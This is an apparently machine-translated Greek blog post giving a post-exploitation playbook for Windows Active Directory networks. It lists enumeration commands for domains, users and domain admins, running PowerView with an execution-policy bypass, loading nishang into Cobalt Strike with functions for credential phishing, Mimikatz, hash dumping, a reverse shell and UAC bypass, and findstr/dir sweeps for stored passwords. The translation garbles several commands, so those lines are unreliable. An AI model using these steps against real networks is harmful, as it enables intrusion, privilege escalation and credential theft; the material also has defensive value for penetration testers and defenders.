τα στοιχεία επικοινωνίας μου
Ταχυδρομείο[email protected]
2024-07-12
한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina
Τέσσερις καταστάσεις:
1. Τοπικός χρήστης: χρήστης
2. Χρήστης τοπικού διαχειριστή: απενεργοποιημένο στην αρχική έκδοση, διαθέσιμο μόνο στον διακομιστή
3. Χρήστες εντός του τομέα
4. Διαχειριστής τομέα
Οι απλοί τοπικοί χρήστες δεν μπορούν να λάβουν πληροφορίες τομέα
Οι χρήστες τοπικού διαχειριστή μπορούν να κλιμακώσουν απευθείας τα δικαιώματά τους στους χρήστες του συστήματος (χρήστες εντός του τομέα) και να λάβουν πληροφορίες εντός του τομέα.
1. Προσδιορίστε εάν ο τομέας υπάρχει:
1. Ελέγξτε τον τομέα: ipconfig/all ή systeminfo ή σταθμός εργασίας net config
ipconfig /all: Βρέθηκε τομέας: hack.com
systeminfo: Ο τομέας που βρέθηκε είναι: hack.com
2. Προβάλετε τον κεντρικό υπολογιστή DNS του τομέα: όνομα τομέα nslookup (hack.com)
3.Καθαρός χρόνος /τομέας τρεις καταστάσεις
Ο τομέας υπάρχει, αλλά ο τρέχων χρήστης δεν είναι χρήστης τομέα
Υπάρχει ένας τομέας και ο τρέχων χρήστης είναι χρήστης τομέα
Το τρέχον περιβάλλον δικτύου είναι μια ομάδα εργασίας και δεν υπάρχει τομέας
Προβολή 1.net: Εμφάνιση λίστας τομέα, λίστα υπολογιστών, καθορισμένοι κοινόχρηστοι πόροι υπολογιστή: net view (εμφάνιση λίστας υπολογιστή) net view \computer (προβολή καθορισμένου κοινόχρηστου υπολογιστή)
net view /domain:domain name (hack) (εμφάνιση λίστας υπολογιστών)
2.net χρήστης για προβολή τοπικών χρηστών: net user /domain για να δείτε πόσοι χρήστες βρίσκονται στον τομέα
Προσθήκη χρήστη: καθαρό όνομα χρήστη (διαχειριστής) κωδικός πρόσβασης (123)/προσθήκη
Χρήση 3.net: Συνδέστε τον υπολογιστή ή αποσυνδέστε τον υπολογιστή από τον κοινόχρηστο πόρο, εμφανίστε τις πληροφορίες σύνδεσης του υπολογιστή
4.net time: Χρησιμοποιήστε το χρόνο για να συγχρονίσετε υπολογιστές ή τομείς: καθαρός χρόνος \computer net time /domain
5.net start: Εκκίνηση της υπηρεσίας ή εμφάνιση της υπηρεσίας που ξεκίνησε: υπηρεσία καθαρής εκκίνησης
6.net pause: Παύση της υπηρεσίας που εκτελείται: υπηρεσία καθαρής παύσης
7.net συνέχεια: Ενεργοποιήστε ξανά την υπηρεσία: υπηρεσία net συνέχεια
8.net stop: Διακοπή υπηρεσίας Windows NT/2000/2003: υπηρεσία διακοπής δικτύου
9.net share: διαγραφή, δημιουργία ή εμφάνιση κοινόχρηστων πόρων
Συνεδρία 10.net: Καταχωρίστε ή αποσυνδέστε τις περιόδους λειτουργίας του τοπικού υπολογιστή και τους πελάτες που είναι συνδεδεμένοι σε αυτόν:
net session //υπολογιστής (προσδιορίζει τον υπολογιστή που θα καταχωριστεί στη λίστα ή θα πραγματοποιηθεί περίοδος λειτουργίας)
net session //διαγραφή υπολογιστή (αποσυνδέστε την περίοδο λειτουργίας του καθορισμένου υπολογιστή)
11.net localgroup Προβολή ομάδας υπολογιστών (ισχύει μόνο για τοπικό): όνομα χρήστη net τοπικής ομάδας
Χρήστης τομέα: όνομα χρήστη/τομέας καθαρής τοπικής ομάδας
Η ομάδα 12.net ερωτά το όνομα της ομάδας στον τομέα (ισχύει μόνο για ελεγκτές τομέα): net group /domain
Το 13.net config εμφανίζει τις τρέχουσες εκτελούμενες υπηρεσίες με δυνατότητα διαμόρφωσης ή εμφανίζει και αλλάζει τη διαμόρφωση μιας υπηρεσίας (τοπικά):
net config (εμφανίζει τις υπηρεσίες που εκτελούνται) υπηρεσίες net config (εμφανίζει μια λίστα υπηρεσιών)
Υπολογιστής 14.net Προσθήκη ή διαγραφή υπολογιστών από τη βάση δεδομένων τομέα:
net computer \computername /add ή /del (προσθήκη ή διαγραφή υπολογιστών στον τομέα σύνδεσης)
Εάν εμφανιστεί η ένδειξη "Η λίστα διακομιστών αυτής της ομάδας εργασίας δεν είναι διαθέσιμη αυτήν τη στιγμή", ενεργοποιήστε τις υπηρεσίες: Διακομιστής, σταθμός εργασίας, πρόγραμμα περιήγησης υπολογιστή και κλείστε το τείχος προστασίας.
Προβολή τομέα: ipconfig/all ή systeminfo ή σταθμός εργασίας net config
Προβολή του κεντρικού υπολογιστή DNS του τομέα: nslookup όνομα τομέα (hack.com)
Τομέας ερωτήματος: καθαρή προβολή /τομέας
Ερώτημα σε όλους τους υπολογιστές στον τομέα: net view /domain:domain name
Υποβάλετε ερώτημα στη λίστα όλων των ομάδων χρηστών στον τομέα: ομάδα δικτύου /τομέας
Υποβάλετε ερώτημα στη λίστα υπολογιστών όλων των μελών τομέα: net group "domain computers" /domain
Ζητήστε τις πληροφορίες κωδικού πρόσβασης στον τομέα: net accounts /domain
Λάβετε πληροφορίες εμπιστοσύνης τομέα: nltest /domain_trusts
Προβολή ονόματος ελεγκτή τομέα: nltest /DCLIST:hack
Δείτε το όνομα του μηχανήματος, βρείτε το IP, ping/nslookup: όνομα ελεγκτή τομέα ping/nslookup
Μερικές φορές το ping είναι απενεργοποιημένο. Χρησιμοποιήστε το nslookup εδώ.
Προβολή ονόματος κεντρικού υπολογιστή ελεγκτή τομέα: nslookup ‐type=SRV _ldap._tcp
Ελέγξτε την τρέχουσα ώρα: καθαρή ώρα /τομέας
Προβολή της ομάδας ελεγκτών τομέα: ομάδα δικτύου "Ελεγκτές τομέα" /τομέας
1. Ζητήστε πληροφορίες χρήστη στον τομέα: net user /domain
2. Προβολή τοπικών χρηστών: wmic useraccount λήψη ονόματος Χρήστες τομέα: wmic useraccount λήψη domain,όνομα
Τοπικός χρήστης:
Χρήστης τομέα:
3. Ελέγξτε τους υπάρχοντες χρήστες: dsquery user (μερικές φορές μπορεί να μην εκτελεστεί και μπορεί να εκτελεστεί μόνο στο μηχάνημα διακομιστή)
4. Ρωτήστε την ομάδα χρηστών τοπικού διαχειριστή: net localgroup administrators
5. Ερώτημα για χρήστες διαχειριστή τομέα: ομάδα δικτύου "διαχειριστές τομέα" /τομέας
6. Υποβάλετε ερώτημα στην ομάδα χρηστών διαχειριστή τομέα: ομάδα δικτύου "Διαχειριστές επιχειρήσεων" /τομέας
Εδώ χρειάζονται δύο εργαλεία
Πρώτα ανεβάστε το εργαλείο στον διακομιστή και μετά εκτελέστε το
1.PVEFindADUser: PVEFindADUser.exe -current (σημειώστε τη διαδρομή) Αυτό το εργαλείο μπορεί να ελέγξει ποιοι χρήστες έχουν συνδεθεί στον υπολογιστή, επιτρέποντάς μας να βρούμε τον διαχειριστή τομέα
2.powerView σενάριο:
powershell.exe ‐exec bypass ‐command "& { import‐module .PowerView.ps1;Invoke‐UserHunter}"
Ελέγξτε πρώτα τα δικαιώματα: Get-ExecutionPolicy
Αλλάξτε την πολιτική εκτέλεσης: Set-ExecutionPolicy Unrestricted (μόνο τα απεριόριστα δικαιώματα μπορούν να εκτελέσουν pow)
εργαλείο nishang (υπάρχει σύνδεσμος λήψης στο προηγούμενο άρθρο):
Αφού το τοποθετήσετε στον κατάλογο CS, εισάγετέ το απευθείας: powershell-import nishang/nishang.psm1
Εκτέλεση: εντολή powershell
Μερικές εντολές που χρησιμοποιούνται συνήθως:
Check-VM: Ελέγξτε αν ο κεντρικός υπολογιστής είναι εικονική μηχανή
Invoke-CredentialsPhish: Ξεγελάστε τον χρήστη ώστε να εισάγει τον κωδικό πρόσβασής του
Get-WLAN-Keys: πληροφορίες wifi
Invoke-Mimikatz: Λήψη κωδικών πρόσβασης
Get-PassHashes: Λάβετε hash
Get-PassHints: Λάβετε τις πληροφορίες υπόδειξης κωδικού πρόσβασης του χρήστη
Invoke-PowerShellTcp: Rebound shell
Invoke-PsUACme: Παράκαμψη UAC
Remove-Update: Αφαιρέστε την ενημερωμένη έκδοση κώδικα
Λήψη πληροφοριών: τοπικές πληροφορίες
Παράδειγμα: powershell Check-VM
1. Συλλέξτε διάφορα ευαίσθητα αρχεία σε καθορισμένους καταλόγους
dir /a /s /bd:"*.txt"
dir /a /s /b C:"*.xlsx"
dir /a /s /bd:"*.md"
dir /a /s /bd:"*.sql"
dir /a /s /bd:"*.pdf"
dir /a /s /bd:"*.docx"
dir /a /s /bd:"*.doc"
dir /a /s /bd:"*conf*"
dir /a /s /bd:"*bak*"
dir /a /s /bd:"*pwd*"
dir /a /s /bd:"*pass*"
dir /a /s /bd:"*login*"
dir /a /s /bd:"*χρήστης*"
2. Συλλέξτε διάφορους κωδικούς πρόσβασης λογαριασμού από αρχεία στον καθορισμένο κατάλογο
findstr /si pass *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si userpwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si pwd *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si login *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
findstr /si χρήστη *.inc *.config *.ini *.txt *.asp *.aspx *.php *.jsp *.xml *.cgi *.bak
Παράδειγμα: dir /a /s /bd:"*.txt"